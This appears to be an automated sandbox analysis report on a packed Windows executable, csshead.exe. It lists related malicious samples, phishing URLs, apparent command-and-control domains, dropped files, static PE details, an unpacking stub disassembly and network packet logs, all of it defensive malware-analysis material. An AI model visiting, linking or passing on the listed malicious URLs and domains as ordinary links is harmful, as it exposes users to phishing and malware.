  • 23.10.249.146
Qg1yzWjpc7.doc51e94976e2c22b08ee1c875499e7113cf08f5b558e16e199689ed9bd536dd99cmaliciousBrowse
  • 23.10.249.146
https://tiny.cc/t8j3uymaliciousBrowse
  • 23.10.249.146
http://wasosamydinag.tk/index/?1631501756857maliciousBrowse
  • 23.10.249.168
http://rgho.st/7jXZr4XY6maliciousBrowse
  • 2.18.212.17

ASN

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
CEA-ASRUinvoice.doc99e5d62bf30a17c4ce8ba5720573338a4cb26863d17a0f61e370618fc5e75adfmaliciousBrowse
  • 212.92.98.189
03290.exea93182cdcde8030cac64378da0406c7f628486ec1cf41b6e49cf5a551c0ab837maliciousBrowse
  • 212.92.98.175
Feb-21774.pdf4aee5f0682a53fd87d05adb69c3d34ede3cbd5251de59e25b140afd247e35b01maliciousBrowse
  • 212.92.98.171
AKAMAI-ASN1USdownload.cnet.com//g00/2_d3d3LmJvc3Rvbi5jb20%3D_/TU9SRVBIRVVTOCRodHRwOi8vY3AtaW4ubmFub3Zpc29yLmlvL2NsaWVudHByb2ZpbGVyL2FkYj9pMTBjLm1hcmsuc2NyaXB0LnR5cGU%3D_$/$/$maliciousBrowse
  • 88.221.15.8
57xibanfkphz.exeb9951284e71c0af5e0d9662c0dfea3db8afcb3e065cb5a3704c91eac5da74e98maliciousBrowse
  • 2.16.4.184
https://webmail.austin-ind.com/owa/redir.aspx?C=o-FsLU9CW6VrWF7lu2ahdpXnscSALx8HSZz0KrgnTo4FYDyZYyjVCA..&URL=https%3a%2f%2fdegusteja.com.br%2fadm%2fadminmaliciousBrowse
  • 23.35.105.9
Sonic_Academy_-_KICK_2_v304_macOS_R2R.app.zip1d3d80fde7efc252a0858e82b5aa0f80e1b8656330a5669827edec5353b8f7c3maliciousBrowse
  • 23.50.8.64
https://agetechpma.com/commonlogin/office/maliciousBrowse
  • 104.94.166.136
PO#170814.html51346c893a034e771e91765d079e9f0b970a5cef26ae057a0520b0660f433399maliciousBrowse
  • 2.16.4.162
a009dce0-5469-415c-8adb-28850befd97.exe6e30aec30e0260eb32e073a600128fe8c5fe42be8b9380d14824ba1fc6c54631maliciousBrowse
  • 2.22.22.98
https://web1.zixmail.net/s/e?b=discoverybenefits&m=ABACkYvodRhNiM5Iddcl8B7p&em=nicole%2esmith%40tasconline%2ecommaliciousBrowse
  • 23.6.101.231
http://leemitchell.com/?reqp=1&reqr=maliciousBrowse
  • 23.6.98.69
https://asenac.com.mx/po213741/?userid=avroman@ccsprojects.commaliciousBrowse
  • 92.122.87.97
https://exchangemailservice01.nut.cc/sso/account/$$$25252520%2525252525%2525252525ZW1haWxfdmVyaWZpY2F0aW9uX5HiMcTyHCi0cQNwykSO0GaIUcXojjpK%25252525252525252525252FJ6qaBdJYLZIucCyKwvDLLvIb92elO8XUs7jVor%25252525252525252525252FUo5t%25252525252525252525252BnIM%2523%2523%2525%2525%2525%2525%2525@$%2523$$/index.php?maliciousBrowse
  • 2.20.240.161
Feedback1492612493425.apk2a36acf075bafa30f87ece74b972bd184443f5dab0fd3b26bca31be270f0d816maliciousBrowse
  • 23.74.12.52
https://signup.live.com/signupmaliciousBrowse
  • 104.80.253.131
YTk8XiSTBu.exedba2740c74863e25f67820cfed201406d2ebad93fa36c7f0f31cdb8252954a75maliciousBrowse
  • 23.223.73.88
Z6irjgNTws.exeb917462a022554aed44b817c3e4b5449a58db12a412aad86c6d84884af30be0cmaliciousBrowse
  • 2.16.4.194
WIRELESS.html18e3aa13e670bf8385d8dfdc975bd2e8b7f2b899a44997b1ee5c1de192ce3579maliciousBrowse
  • 92.122.87.97
http://helpdesk.ovanet.cz/pay/incoming-wire-payment-from-CZ-in-USD-accepted-method-direct-deposit/maliciousBrowse
  • 23.43.140.49
http://yobit.com/maliciousBrowse
  • 2.20.208.194
http://aww.su/KMamfmaliciousBrowse
  • 23.59.191.98
Invoice Due - tb.pdfca3ef0863c4c995d299f0ed841260e15e6ea38f8f01081a724adacf247b3d278maliciousBrowse
  • 72.246.43.34

Dropped Files

No context

Screenshots

windows-stand

Startup

  • System is w10native
  • csshead.exe (PID: 2092 cmdline: 'C:\Users\user\Desktop\csshead.exe' MD5: F0309AA0519EE70C29BBB471352781E7)
    • explorer.exe (PID: 3160 cmdline: C:\Windows\explorer.exe MD5: FCBCED2A237DCD7EF86CED551B731742)
  • cleanup

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A9311CC87BA03C7CB180095ACB967E37
Process:C:\Windows\explorer.exe
File Type:data
Size (bytes):527
Entropy (8bit):7.129034712535047
Encrypted:false
MD5:5EA8794450A464D1E5A793BF024CCB43
SHA1:A667467CA1544B527E53063702259B3028116538
SHA-256:5972FAB7F0C32338924510B0E1DB743D94E9B7AB7044372CF564AAE88431BEFD
SHA-512:0D4E6CD75A1427719A7DB376E8E7CBF0AD7EAEA05954BE0F057218F7B18565165D458D7DB24436AAF28A0E75C532DE925D20B4483B05BB601A95D81FC196DCB7
Malicious:false
Reputation:low
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CFE86DBBE02D859DC92F1E17E0574EE8_FDB452422670E72EDD3FB3D65568F821
Process:C:\Windows\explorer.exe
File Type:data
Size (bytes):468
Entropy (8bit):7.092843961483663
Encrypted:false
MD5:D9D754520AE3340AA37CCA6115EEE05B
SHA1:A0320372760D99C762CB2EB4B37F776625EF1B33
SHA-256:7DC8284C51C9A38DC1BF03BD28857EA5336E8F5C564EDDBB1C9082EE43C93738
SHA-512:440F6A9EA2CE5ECD1FD7CB3D122A6F5F108550D71A9FF5F88F235BE5495903712555F95C75F66CCF716AC2A49202716EDBDBAFBD114EFF0AD3D98E3DA6A30C94
Malicious:false
Reputation:moderate, very likely benign file
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E49827401028F7A0F97B5576C77A26CB_7CE95D8DCA26FE957E7BD7D76F353B08
Process:C:\Windows\explorer.exe
File Type:data
Size (bytes):1398
Entropy (8bit):7.532468340062992
Encrypted:false
MD5:6804589F15C01A63F62D811AFB17F5A4
SHA1:0EE07820C833230C7F440825F64DD5085BD17500
SHA-256:182643FE2A3C2D2E9B058A3BF728740DB7E17BBF6A6036E415CBE601F6BFE144
SHA-512:505B96A34A6BC47CD83EB54853CA80BCB4A4D5749109BF1DDDBAAEBBEDB52A98EB6AEA06993738F58194E16B5F89F2F8371474666B199E270B06594F056DB5F2
Malicious:false
Reputation:moderate, very likely benign file
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F5F320A94D4D2B4465D8F17E2BB2D351_0BA94B3A3CB67F245E2A70E0B581D64B
Process:C:\Windows\explorer.exe
File Type:data
Size (bytes):463
Entropy (8bit):7.143719128336462
Encrypted:false
MD5:82FABB6055C9FBC15C0E37ACF8826E36
SHA1:BF2BD4BA0D9E221E1469DFDC8CF030F514635365
SHA-256:69229EFC637140F3ED53BA3A315B16554499A69CB8EE90111AA3F622267D4344
SHA-512:C14DFEAF0885F4252797AC674BA0F8CDBDC25BDF899DD0C9A93BCE875B87282643D5AF5FD34D42E1E9BE59C1744F501659386D8D2075D14C67DEA005A7039487
Malicious:false
Reputation:low
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A9311CC87BA03C7CB180095ACB967E37
Process:C:\Windows\explorer.exe
File Type:data
Size (bytes):574
Entropy (8bit):3.662342996973562
Encrypted:false
MD5:3EBE9A5F5F34063AFA06744E9DE2F17A
SHA1:248757DEA97B14602C2944744427D9315EE63128
SHA-256:5E64BE9693E92965EFC009D02C1281750522B2C9FCDEC70A95C4B08F987D7E15
SHA-512:5D96EC82279D0B05602C3802780DA7FED497F7294A6A03B309C1D468D69A8906D44E061F50F2BDF4EEF70C72AE5B76AC8990665344AB38DFBDB7FA4DA4DFD870
Malicious:false
Reputation:low
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CFE86DBBE02D859DC92F1E17E0574EE8_FDB452422670E72EDD3FB3D65568F821
Process:C:\Windows\explorer.exe
File Type:data
Size (bytes):804
Entropy (8bit):3.578213099146921
Encrypted:false
MD5:CD0A963092D1F65356D760A30629F14B
SHA1:B00B4F4177AC8989BD5AFF207CBC1528487F9005
SHA-256:1AD3FF15184CF55A63859149CCD3522105FADF7CBB3335ED8646204416B3D0B5
SHA-512:2DC6F55DE72FB9839E3114A601512741FBA150504F1CDA5A9D2CF9EF1AF3DA9508517DD3572BD4B5DD190442992ED7AA5B955DCD3641B76721E3E42731949C3A
Malicious:false
Reputation:low
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E49827401028F7A0F97B5576C77A26CB_7CE95D8DCA26FE957E7BD7D76F353B08
Process:C:\Windows\explorer.exe
File Type:data
Size (bytes):1028
Entropy (8bit):3.8212378291798217
Encrypted:false
MD5:A94BB63C682A4B30397F4D9E515E043E
SHA1:6A181B5722338B0B4647A1286A9525B8C4F2DF23
SHA-256:BD0E25F5B6B92983F95A693F416D6576DA031B71EA25A73F350725FF7B504C06
SHA-512:C1BAE4FDB65DF1C1B8ED80926ADB1707D0CC17E89008A92AB1BED105609F4A5C119D24B2483F87C1ABBACCB0A09D588A1223D40216F761494E73DD07D78CC0DE
Malicious:false
Reputation:low
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F5F320A94D4D2B4465D8F17E2BB2D351_0BA94B3A3CB67F245E2A70E0B581D64B
Process:C:\Windows\explorer.exe
File Type:data
Size (bytes):780
Entropy (8bit):3.604571038206961
Encrypted:false
MD5:0F2682CA297F407B8C5231557BF4D0A0
SHA1:F671D2294F57021C00E65663E28763F8371D62BC
SHA-256:8DA3AD031431DAA315AB5F261C8D40151217EC2D375925BEEF23ABA9A1FBF3CF
SHA-512:897AE175042D90C618FBDCB7A7DDA74A3D1401E2EBF55D99CA89F60763A3ED9FF7B594EC770EE3DD33AEFF03D17E4E6568A7437ED107717E68D136DD04EF6F84
Malicious:false
Reputation:low
C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\8HKBBA10.txt
Process:C:\Windows\explorer.exe
File Type:ASCII text
Size (bytes):353
Entropy (8bit):5.397957733795783
Encrypted:false
MD5:8BA35BF9B54B5322C35ABDB800A8ED93
SHA1:0404121ED5669381BF2933694547B0768E49001B
SHA-256:83DF3D0F3CDAB80A9AAC23DFF3E14A1DE09890F8C95B43C9BC950317CFACB1A2
SHA-512:2FAA7BFD9BF775631DD1921B44A0C81BC9CCE32BF5B2B68B5E39FE25FA90CA09666E3CA7575B62E163E6314E0701DF15DBB93699F645CEB35B82FEF0F10CECE3
Malicious:false
Reputation:low
C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\JCHEUQQL.txt
Process:C:\Windows\explorer.exe
File Type:ASCII text
Size (bytes):353
Entropy (8bit):5.362763176409748
Encrypted:false
MD5:225DA76465EEBA3893442E6CCECB6D75
SHA1:EB05ED97BE3490E86193D44D474449C3E34C519B
SHA-256:CAD78851E2AB7AB02A725337DF5BEC4733021897F2B4AE18E3F7643B6BAE98CF
SHA-512:9C578E17921FE35B79E0D02CCBDC5CCE6A3C0A9470649A111AECADFBE4FFBE49E0C164E6F5109BA3928FD959DF87BC648424784159DCE5D0DF9C7F56411BDD9D
Malicious:false
Reputation:low
C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\RAYBHMAB.txt
Process:C:\Windows\explorer.exe
File Type:ASCII text
Size (bytes):80
Entropy (8bit):4.194702276078295
Encrypted:false
MD5:B63564A29E3D506314179C9F8C0D3F25
SHA1:DAAE378D901DBF66BA21F6082273DEDB1EA091FD
SHA-256:A0E289F258F6920E40C76429D951EC79029AC8FCAEB7B9C0F16EFBA408678EDB
SHA-512:6B7197080C33C6C107DF62BD520B9B2FE32421C09D3A39180DF784D8BD761D979968E634FCA9339E7E01F27007B86DE707B090C1AA8ACB6D5659649C5D66FC23
Malicious:false
Reputation:low
C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\SZE861DT.txt
Process:C:\Windows\explorer.exe
File Type:ASCII text
Size (bytes):276
Entropy (8bit):5.500010305349747
Encrypted:false
MD5:A127FEDD02E99FA24293396B29F8ABCE
SHA1:B73CC983AAA84C9D70CDF2FD8985DE6A960C8C8D
SHA-256:D1E5DD9D585A115034221C829484D68EC8A049F12183D2F165A31F5ED6E976B8
SHA-512:3D6AD4D16280D105B41A529015407AA0CA9CAFBE1D5C8A10D9A0174E99204B06D08304EB5AC030B830182CBF42BE2BA93FD8DBE40E7B43DDC3FF2A12237EAF76
Malicious:false
Reputation:low
C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\VHSXFLHR.txt
Process:C:\Windows\explorer.exe
File Type:ASCII text
Size (bytes):353
Entropy (8bit):5.392241514939074
Encrypted:false
MD5:43FA37E3BA662C9DFE080ED8D54EFAC6
SHA1:F602E0546CA9399A96EC37A75CB0584DF77B3510
SHA-256:F554EF45F52CFDAF3A6D2BD69308CE486D7796F4B7D35315F5FDCAA7502A42F2
SHA-512:074A462FB8C7010502FC74781E79386559584F93C4FE5C855F36439DE3D296A641B40DB491D057BC25826DDFD86CCC39B5696A5A1243168F53F023F2A482A7F5
Malicious:false
Reputation:low
C:\Users\user\Desktop\csshead.exe
Process:C:\Windows\explorer.exe
File Type:data
Size (bytes):166400
Entropy (8bit):4.137499387864356
Encrypted:false
MD5:90064D18FAC8A24969AD3D1FCB9CD121
SHA1:112ABB6EE536EB5EEBB53A8AA334CA8C7139787E
SHA-256:548CF86C9A6D977128A0C153FAF4512B83D4C6F569CC8A2462A52DC74A778F59
SHA-512:8861013CF8D46EE72AA95EC737F0809405DA101027047F8C8096CB4964F50941705A7A28834C866022A246A92294C002536F4A3C033A521DB709EC7760803E5A
Malicious:true
Reputation:low

Contacted Domains/Contacted IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
a771.dscq.akamai.net23.10.249.152truefalse0%, virustotal, Browsehigh
wigermexir.com212.92.98.68truetrue1%, virustotal, Browseunknown
a279.dscq.akamai.net23.10.249.146truefalse0%, virustotal, Browsehigh
www.google.com216.58.210.4truefalse1%, virustotal, Browsehigh
a1621.g.akamai.net23.10.249.34truefalsehigh
www3.l.google.com216.58.210.14truefalsehigh
hs1agojraguo.comunknownunknowntrueunknown
pmtz1iirvr.comunknownunknowntrueunknown
n5k2ekq2ro.netunknownunknowntrueunknown
gj2pexhfy95v.netunknownunknowntrueunknown
hvzaduc42t2o.comunknownunknowntrueunknown
titz9qqc5szt.netunknownunknowntrueunknown
hp1sofo5bnc.comunknownunknowntrueunknown
phyrnfojfwiyuz.netunknownunknowntrueunknown
gvyn4bo2n3qq.netunknownunknowntrueunknown
ktchyigkk2iwi3.comunknownunknowntrueunknown
rmqgc5frw3.comunknownunknowntrueunknown
tdgku3qbl1r.netunknownunknowntrueunknown
gdelzlc224n5q9.netunknownunknowntrueunknown
zqvdnvokoq.netunknownunknowntrueunknown
nvxij5qutl.netunknownunknowntrueunknown
tyou23hsrm.netunknownunknowntrueunknown
ocsp.int-x3.letsencrypt.orgunknownunknownfalsehigh
e45cukuntbcou.netunknownunknowntrueunknown
j4rjf2dtjl.comunknownunknowntrueunknown
jdf2xx9wetn.comunknownunknowntrueunknown
ushy2wtgwvny.comunknownunknowntrueunknown
r5hfff2lnn9mn.comunknownunknowntrueunknown
zo4q11gk3iyjgw.comunknownunknowntrueunknown
tmmq5lcauha.netunknownunknowntrueunknown
ocsp.pki.googunknownunknowntrueunknown
5v95xlfdzrj1de.netunknownunknowntrueunknown
erz5yxeblneu.netunknownunknowntrueunknown
cwug3djg3reoa9.netunknownunknowntrueunknown
s4v3xhn3swcbmbc.comunknownunknowntrueunknown
hdylvm3db3ixvi.comunknownunknowntrueunknown
5julzwwlbkrgvm.netunknownunknowntrueunknown
4yony3itl9losv.comunknownunknowntrueunknown
b1l41m3rggg5nz.comunknownunknowntrueunknown
fcs1fscxh2oa.comunknownunknowntrueunknown

Contacted URLs

NameProcess
http://ocsp.int-x3.letsencrypt.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBR%2B5mrncpqz%2FPiiIGRsFqEtYHEIXQQUqEpqYwR93brm0Tm3pkVl7%2FOo7KECEgO54qVnGaYpxjBEoQUm57uvQQ%3D%3DC:\Windows\explorer.exe
http://ocsp.pki.goog/gsr2/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBTgXIsxbvr2lBkPpoIEVRE6gHlCnAQUm%2BIHV2ccHsBqBt5ZtJot39wZhi4CDQHjqTAc%2FHIGOD%2BaUx0%3DC:\Windows\explorer.exe
http://ocsp.pki.goog/GTSGIAG3/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCCCIrzM%2FKFFw%2BC:\Windows\explorer.exe

Contacted IPs

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Public

IPCountryFlagASNASN NameMalicious
212.92.98.68Russian Federation
12790CEA-ASRUtrue
23.10.249.152United States
20940AKAMAI-ASN1USfalse
216.58.210.4United States
15169GOOGLE-GoogleIncUSfalse
216.58.210.14United States
15169GOOGLE-GoogleIncUSfalse

Static File Info

General

File type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Entropy (8bit):7.868755127097456
TrID:
  • Win32 Executable (generic) a (10002005/4) 99.39%
  • UPX compressed Win32 Executable (30571/9) 0.30%
  • Win32 EXE Yoda's Crypter (26571/9) 0.26%
  • Generic Win/DOS Executable (2004/3) 0.02%
  • DOS Executable Generic (2002/1) 0.02%
File name:csshead.exe
File size:165888
MD5:f0309aa0519ee70c29bbb471352781e7
SHA1:c0c4dd4c997f2a590eb5d9947e2ba81e79ce3c13
SHA256:7c13b9ab1ce7fdeeb8fbb235ed593e4affdedf317a6b7eac06ca3a64ab62daba
SHA512:3e0f96ccc07b3ded937e7ec01a5f2a858ceb8b88db53ad5a289172ae7b9f5722de689f4a0ecc39275b4c8c1a0be32466d147187a2025911dfadd199af4302ada
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*I.dn(.7n(.7n(.7.^?7k(.7u..7J(.7gP.7i(.7gP.7I(.7n(.7.).7u.>7.(.7u.?7/(.7u..7o(.7u..7o(.7Richn(.7........PE..L...F.9[...........

File Icon

Static PE Info

General

Entrypoint:0x455020
Entrypoint Section:UPX1
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
DLL Characteristics:TERMINAL_SERVER_AWARE
Time Stamp:0x5B392E46 [Sun Jul 1 19:40:54 2018 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:5
OS Version Minor:1
File Version Major:5
File Version Minor:1
Subsystem Version Major:5
Subsystem Version Minor:1
Import Hash:d3f973e583f24cd9a8059dc45e2d8e5a

Entrypoint Preview

Instruction
pushad
mov esi, 0042E000h
lea edi, dword ptr [esi-0002D000h]
push edi
jmp 00007F79C1A7DACDh
nop
mov al, byte ptr [esi]
inc esi
mov byte ptr [edi], al
inc edi
add ebx, ebx
jne 00007F79C1A7DAC9h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F79C1A7DAAFh
mov eax, 00000001h
add ebx, ebx
jne 00007F79C1A7DAC9h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc eax, eax
add ebx, ebx
jnc 00007F79C1A7DACDh
jne 00007F79C1A7DAEAh
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F79C1A7DAE1h
dec eax
add ebx, ebx
jne 00007F79C1A7DAC9h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc eax, eax
jmp 00007F79C1A7DA96h
add ebx, ebx
jne 00007F79C1A7DAC9h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc ecx, ecx
jmp 00007F79C1A7DB14h
xor ecx, ecx
sub eax, 03h
jc 00007F79C1A7DAD3h
shl eax, 08h
mov al, byte ptr [esi]
inc esi
xor eax, FFFFFFFFh
je 00007F79C1A7DB37h
sar eax, 1
mov ebp, eax
jmp 00007F79C1A7DACDh
add ebx, ebx
jne 00007F79C1A7DAC9h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F79C1A7DA8Eh
inc ecx
add ebx, ebx
jne 00007F79C1A7DAC9h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F79C1A7DA80h
add ebx, ebx
jne 00007F79C1A7DAC9h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc ecx, ecx
add ebx, ebx
jnc 00007F79C1A7DAB1h
jne 00007F79C1A7DACBh
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jnc 00007F79C1A7DAA6h
add ecx, 02h
cmp ebp, FFFFFB00h
adc ecx, 02h

Data Directories

NameVirtual AddressVirtual Size Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IMPORT0x56a8c0x468.rsrc
IMAGE_DIRECTORY_ENTRY_RESOURCE0x560000xa8c.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
IMAGE_DIRECTORY_ENTRY_TLS0x00x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x551d40x48UPX1
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IAT0x00x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

Sections

NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
UPX00x10000x2d0000x0False0empty 0.0IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
UPX10x2e0000x280000x27400False0.984499402866data7.9056858021IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc0x560000x10000x1000False0.3466796875data4.1879643937IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

Resources

NameRVASizeTypeLanguageCountry
RCDATA0x451e80x3e6bdataEnglishUnited States
RCDATA0x490540x4080dataEnglishUnited States
RT_ICON0x561ec0x128GLS_BINARY_LSB_FIRSTEnglishUnited States
RT_ICON0x563180x2e8dataEnglishUnited States
RT_GROUP_ICON0x566040x22MS Windows icon resource - 2 icons, 16x16, 16-colorsEnglishUnited States
RT_VERSION0x5662c0x300dataEnglishUnited States
RT_MANIFEST0x569300x15aASCII text, with CRLF line terminatorsEnglishUnited States

Imports

DLLImport
KERNEL32.DLLLoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
ADVAPI32.dllRegCloseKey
COMCTL32.dll
COMDLG32.dllGetFileTitleA
dxva2.dllGetNumberOfPhysicalMonitorsFromHMONITOR
GDI32.dllPatBlt
gdiplus.dllGdipFree
mscms.dllOpenColorProfileA
NETAPI32.dllNetShareGetInfo
ODBC32.dll
ole32.dllCoInitialize
OLEAUT32.dllSysFreeString
pdh.dllPdhGetFormattedCounterValue
SHELL32.dllDragQueryFileA
SHLWAPI.dllPathIsUNCA
USER32.dllGetDC
WININET.dllFtpPutFileEx
WINMM.dllmmioAscend
WINSPOOL.DRVEnumPrintersA

Version Infos

DescriptionData
LegalCopyrightCopyright (C) 2018
InternalNametemplate.exe
FileVersion1.0.0.1
CompanyNameTODO: <Company name>
ProductNameTODO: <Product name>
ProductVersion1.0.0.1
FileDescriptionTODO: <File description>
OriginalFilenametemplate.exe
Translation0x0409 0x04b0

Possible Origin

Language of compilation systemCountry where language is spokenMap
EnglishUnited States

Network Behavior

Network Port Distribution

TCP Packets

TimestampSource PortDest PortSource IPDest IP
Jul 4, 2018 14:05:39.356622934 CEST6075753192.168.0.608.8.8.8
Jul 4, 2018 14:05:39.374761105 CEST53607578.8.8.8192.168.0.60
Jul 4, 2018 14:05:39.391248941 CEST49684443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:39.401643038 CEST44349684216.58.210.4192.168.0.60
Jul 4, 2018 14:05:39.401794910 CEST49684443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:39.460378885 CEST49684443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:39.470989943 CEST44349684216.58.210.4192.168.0.60
Jul 4, 2018 14:05:39.479304075 CEST44349684216.58.210.4192.168.0.60
Jul 4, 2018 14:05:39.479382038 CEST44349684216.58.210.4192.168.0.60
Jul 4, 2018 14:05:39.479413986 CEST49684443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:39.479485989 CEST49684443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:39.479552984 CEST44349684216.58.210.4192.168.0.60
Jul 4, 2018 14:05:39.479604959 CEST49684443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:39.648799896 CEST4950153192.168.0.608.8.8.8
Jul 4, 2018 14:05:39.668544054 CEST53495018.8.8.8192.168.0.60
Jul 4, 2018 14:05:39.670089006 CEST4968580192.168.0.60216.58.210.14
Jul 4, 2018 14:05:39.680455923 CEST8049685216.58.210.14192.168.0.60
Jul 4, 2018 14:05:39.680562973 CEST4968580192.168.0.60216.58.210.14
Jul 4, 2018 14:05:39.680968046 CEST4968580192.168.0.60216.58.210.14
Jul 4, 2018 14:05:39.691356897 CEST8049685216.58.210.14192.168.0.60
Jul 4, 2018 14:05:39.691977978 CEST8049685216.58.210.14192.168.0.60
Jul 4, 2018 14:05:39.754225016 CEST4968580192.168.0.60216.58.210.14
Jul 4, 2018 14:05:39.769212008 CEST4968580192.168.0.60216.58.210.14
Jul 4, 2018 14:05:39.780742884 CEST8049685216.58.210.14192.168.0.60
Jul 4, 2018 14:05:39.832269907 CEST4968580192.168.0.60216.58.210.14
Jul 4, 2018 14:05:39.837111950 CEST49684443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:39.837531090 CEST49684443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:39.848387003 CEST44349684216.58.210.4192.168.0.60
Jul 4, 2018 14:05:39.848472118 CEST49684443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:39.931070089 CEST44349684216.58.210.4192.168.0.60
Jul 4, 2018 14:05:39.931253910 CEST49684443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:39.931483030 CEST44349684216.58.210.4192.168.0.60
Jul 4, 2018 14:05:39.931587934 CEST49684443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:39.931799889 CEST44349684216.58.210.4192.168.0.60
Jul 4, 2018 14:05:39.931901932 CEST49684443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:39.932318926 CEST44349684216.58.210.4192.168.0.60
Jul 4, 2018 14:05:39.932409048 CEST44349684216.58.210.4192.168.0.60
Jul 4, 2018 14:05:39.932425022 CEST49684443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:39.932518005 CEST49684443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:39.932926893 CEST44349684216.58.210.4192.168.0.60
Jul 4, 2018 14:05:39.933017015 CEST44349684216.58.210.4192.168.0.60
Jul 4, 2018 14:05:39.933031082 CEST49684443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:39.933125973 CEST49684443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:39.933700085 CEST44349684216.58.210.4192.168.0.60
Jul 4, 2018 14:05:39.933733940 CEST44349684216.58.210.4192.168.0.60
Jul 4, 2018 14:05:39.933803082 CEST49684443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:39.933901072 CEST49684443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:39.934309006 CEST44349684216.58.210.4192.168.0.60
Jul 4, 2018 14:05:39.934412956 CEST49684443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:39.934608936 CEST44349684216.58.210.4192.168.0.60
Jul 4, 2018 14:05:39.934710979 CEST49684443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:39.934868097 CEST44349684216.58.210.4192.168.0.60
Jul 4, 2018 14:05:39.934967995 CEST49684443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:39.935439110 CEST44349684216.58.210.4192.168.0.60
Jul 4, 2018 14:05:39.935528040 CEST44349684216.58.210.4192.168.0.60
Jul 4, 2018 14:05:39.935544014 CEST49684443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:39.935645103 CEST49684443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:39.942102909 CEST44349684216.58.210.4192.168.0.60
Jul 4, 2018 14:05:39.942174911 CEST44349684216.58.210.4192.168.0.60
Jul 4, 2018 14:05:39.942248106 CEST49684443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:39.942315102 CEST49684443192.168.0.60216.58.210.4
